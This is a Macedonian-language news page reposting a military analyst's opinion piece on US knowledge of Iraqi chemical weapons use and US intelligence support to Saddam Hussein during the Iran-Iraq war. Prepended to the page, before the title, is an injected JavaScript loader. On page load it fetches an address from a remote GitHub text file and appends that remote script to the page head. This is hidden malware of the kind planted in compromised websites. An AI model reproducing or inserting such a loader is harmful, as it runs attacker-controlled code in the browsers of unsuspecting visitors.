;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Сојузот САД - Садам Хусеин и воените злосторства против Иран и Курдите - Антропол
АктуелноИнтернационално

Сојузот САД – Садам Хусеин и воените злосторства против Иран и Курдите

  • Фејсбук статус на Дарко Тодоровски- Магистер по меѓународни односи и воен аналитичар

Постојано се појавуваат докази дека во реалниот живот нема ограничувања за Американците во обезбедувањето на националните интереси за време на вооружени конфликти ширум светот. Така беше во осумдесеттите години на минатиот век за време на Иранско-ирачката војна (1980-1988). Документите декласифицирани денес и интервјуата со учесниците во настаните од тоа време што се појавија во медиумите укажуваат дека Вашингтон, барем од 1983 година, знаел и имал податоци за употребата на хемиско оружје од страна на ирачкиот режим на Садам Хусеин во војната со Иран, но не ги објави тие докази на меѓународната заедница, додека Техеран очајно требаше да ги документира своите обвинувања за користење на хемиско оружје од страна на Ирак.

Во 1986 година, американското Министерство за одбрана предложи да се споделуваат сензитивни разузнавачки информации со Багдад, но тоа беше одбиено бидејќи ЦИА и Стејт департментот го „анатемисаа“ Садам Хусеин и неговите „насилници“. Меѓутоа, ситуацијата се промени во 1987 година, кога ЦИА, потпирајќи се на податоци од вселенската разузнавачка служба, го извести американскиот претседател Роналд Реган за подготовката на Иранците за офанзива на јужниот сектор на фронтот во регионот југоисточно од Басра. По разгледувањето на извештајот, Реган на секретарот за одбрана Френк Карлучи му рекол: „Победата на Иран е неприфатлива. Дејствувајте“.

Тоа послужило како почетна точка за последователно имплементирана програма од страна на американските и ирачките воени оддели на програмата за размена на вселенски и електронски разузнавачки податоци. Полковникот Рик Франкона, кој тогаш беше воено аташе на американската амбасада во Багдад, тврдеше дека тоа всушност биле готови пакети со податоци за означување на целита за ирачките авиони, кои, заедно со артилерија, исто така биле користени од Багдад за употреба на хемиско оружје (нервен агенс – отровен сарин). Во март 1988 година беше употребено хемиско оружје против курдските бунтовници, а еден месец подоцна и против иранските трупи за време на ослободувањето на полуостровот Фао. Поразот кај Фао беше причина за откажување на офанзивата на иранските трупи на Басра и, во целина, придонесе за завршување на војната под услови прифатливи за Багдад и Вашингтон. Се во името на “демократијата”, упс, во името на стратешките интереси на САД…